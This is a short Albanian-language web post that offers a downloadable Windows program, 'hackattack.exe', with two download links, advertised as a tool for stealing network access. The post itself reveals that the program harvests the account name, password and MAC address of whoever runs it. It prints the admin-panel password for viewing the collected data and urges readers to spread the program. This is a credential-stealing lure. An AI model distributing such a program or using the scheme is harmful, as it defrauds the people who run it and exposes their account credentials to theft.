Music:

   
  K!nnezzi.
  Nje menyr si te vjedhim rrjet nga te tjeret
 
Gabim [Hack'Attack] Nje menyr me vjedh internet

e kam ba kit program per mu munu me vjedh rrjet

e pash se e kish postu ni antar n'khg [Splinter] dhe e kish ba kishe me marr internet pa pare
e ka dit passwordin e admincp
mos u mashtroni

Download:
Kodi:
http://www.conndor.net/hackattack.exe
[Mirror]:
Kodi:
http://depositfiles.com/files/3009785
Shperndajeni programin

Passwordi i Admin CP osht:
Kodi:
ipkokujtesahack
un nuk pe perdori kshtu qe vendosa me
qit n'khg

masi qi t'ia jepni najkujt programin aj e shkrun aty Accountin passwordin edhe MAC Adresen
Qysh mi gjet kto t'dhana?:
Hini te butoni AdminCP edhe shkrujeni passwordin qi e thash ma nalt
edhe tani aty jan krejt t'dhanat qka kan shkrujt njerzit
 
  Today, there have been 15 visitors (45 hits) on this page!  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free